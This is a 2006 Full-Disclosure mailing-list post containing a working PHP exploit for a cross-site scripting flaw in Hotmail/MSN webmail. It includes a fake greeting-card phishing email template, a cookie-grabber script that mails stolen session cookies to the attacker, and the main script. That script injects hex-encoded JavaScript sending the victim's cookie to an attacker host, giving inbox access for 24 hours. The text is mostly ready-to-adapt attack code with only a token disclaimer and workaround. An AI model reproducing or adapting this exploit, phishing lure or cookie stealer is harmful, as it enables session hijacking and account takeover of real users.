/* Hotmail/MSN Cross Site Scripting Exploit

Author: Simo Ben youssef aka _6mO_HaCk
Contact: Simo_at_morx_dot_org
Discovered: September 15 2005
Published: February 20 2006
Vendor: MSN.com
Service: Hotmail.com Webmail Service
Vulnerability: Cross Site Scripting (Cookie-Theft)
Severity: Medium/High
Tested on: IE 6.0 (designed for) firefox 1.5 and Opera (should work on all
browsers)
Original Advisory/Xploit: http://www.morx.org/HotmailCookieXploit.txt
Morx Security Research Team
http://www.morx.org

Description:

Exploit written in PHP to exploit the $a variable cross site scripting
vulnerability inside Hotmail/MSN inbox. Exploit requires the victim to
open the email sent by the attacker and click on a URL, therefore some
Social Engineering skills are required too

Notice: if you dont know what's cross site scripting or/and how its being
exploited then just stop reading by here as you will have to modify some
things on the exploit to make it work for you, but if you insist then good
luck.

Exploitation:

Exploiting this flaw seemed to be almost impossible on Internet Explorer
Browsers, because the vulnerable variable resides inside the hotmail inbox
and its value has to be correct and we cant avoid it, replace it or guess
it in anyway, at this point it was ok while it was possible to get the
victim click on the url and grab the entire HTTP referrer add our
malicious code at the end of the variable value and redirect the victim
back to the HTTP referrer with one single script, this worked just fine on
firefox while it didnt work on IE beacause hotmail filters <a href=""> and
replace it with javascript:ol(); so the link opens a new internet explorer
window, and of course when IE opens another window it doesnt send the HTTP
referrer where from the link was opened previously, so one way to exploit
this was to insert an <img src=""> and make it point to a php script
in order to grab the HTTP referrer of the victim, reconstruct it, add
javascript code at the end of the $a variable value and then open another
php script in the same server and write on it some php code to make an
automatic redirection to the re constructed HTTP referrer when the victim
clicks on the second link, and therefore get the malicious code executed
which will grab the user authentification cookie and send it to the
attacker script giving the attacker full access to the victim inbox for 24
hours, which's the default time set in hotmail for cookie expiration :)

Exploiting this vulnerability can be done by uploading the following
script to a php enabled webserver then send an email to the victim with
<img src="http://www.attacker-server.com/a.php"> where a.php is the php
exploit file name and <a
href="http://http://www.attacker-server.com/ecard.php"> is the link of the
second script (the one that get created by a.php) as i said some Social
Engineering skills are required, so as an example the email can be sent as
a greeting card with the following HTML code, you may also need to modify
some things on the php exploit to make it fit your needs.
Hello, </p>
Jennifer has just sent you a greeting card. </p>
To view your greeting card, click on the link below: </p>
<a href="http://attacker-site/ecard.php"> http://
lycos.americangreetings.com/view.pd?i=197489639&amp;m=8381&amp;rr=y&amp;source=lycos
</a> </p>
Or copy and paste the above link into your web browser's address window</p>
Or enter this eCard number 9584B7E784 on our eCard Pick Up page at
www.americangreetings.com</p>
Thanks for using Lycos Greetings with AmericanGreetings.com
<img src="http://attacker-site/a.php"></img>

as a cookie grabber you may use the following code:

$cookie = $_GET['cookie'];
$ip = getenv("REMOTE_ADDR");
$msg = "Cookie: $cookie\nIP Address: $ip";
$subject = "cookie";
mail("your@email.org", $subject, $msg);

header ("location:
http://www.americangreetings.com/view.pd?i=405014155&m=6355&source=ag999");

at the end i would like to say a big thanks to mat
(mattzew5_at_hotmail_dot_com) for helping me research and test this
exploit, it took several days of research to exploit this flaw, so once
again thanks mat

greets to all MorX members and especially to BlooDMASK even though he
refused to let me test this on his hotmail account, certainly thats
because he has some nice xxx passwords on it :) also greets to barbenoir
(boule7ia), th3-brain, Dragos and everybody else.

Why am i publishing this late ?

because i found better flaws in hotmail which i wont be releasing anytime
soon :)

Workaround:

avoid clicking on links while being autentified.

Disclaimer:

this entire document is for eductional, testing and demonstrating purpose
only. Modification use and/or publishing this information is entirely on
your OWN risk. The information provided in this advisory is to be
used/tested on your OWN machine/Account. I cannot be held responsible for
any of the above.

 ------------------------ Hotmail/MSN accounts XSS Xploit by Simo Ben
youssef ---------------------- */

<?php

/* file name of the script that's the victim will visit
make sure your webserver has writting permissions
otherwise create ecard.php manualy and chmod it to 777 or whatever */

$file = "ecard.php";

// get the http referrer that we get with <img

$HTTP_REFERER = getenv("HTTP_REFERER");

$host = $HTTP_REFERER;

// reconstruct the http referrer

// get the &curmbox string position

$first = strpos($host, '&curmbox');

// get the first url part based on $curmbox position

$firstpart = substr($host, 0, $first);

// get the second url part

$secondpart = substr($host, $first);

/* split the second part and list the first
 two variables since hotmail dublicate those sometimes */

list($a, $b, $c) = split('[&]', $secondpart);

// put all the above together

$target = "$firstpart&$a$b&$c";

$fo = fopen($file, 'w+');

// change this to your cookie grabber address, dont include "http://" as
its already included in hex
// the variable name for the cookie grabber should be included too

$d = 'www.attacker-site.com/cookie-grabber.php?cookie';

// first javascript hex code

$e =
'%22%3E%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70%3A%2F%2F';

// second javascript hex code

$f =
'%3D%27%2B%65%73%63%61%70%65%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%2E%73%75%62%73%74%72%28%30%2C%31%39%30%30%29%3C%2F%73%63%72%69%70%74%3E';

// convert the cookie grabber url to hex code and add "%" at the first of
each hex caracter

$converted = bin2hex($d);

$converted = chunk_split($converted, 2, '%');

$converted = '%' . substr($converted, 0, strlen($converted) - 1);

$data = '<?php header ("Location: ' . $target . '' . $e . '' . $converted
.  '' . $f .'"); ?>';

/* write the data that would redirect the victim to the reconstructed http
referrer and exploit the vulnerable variable and make the cookie
redirection */

fwrite($fo, $data);

fclose($fo);

?>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/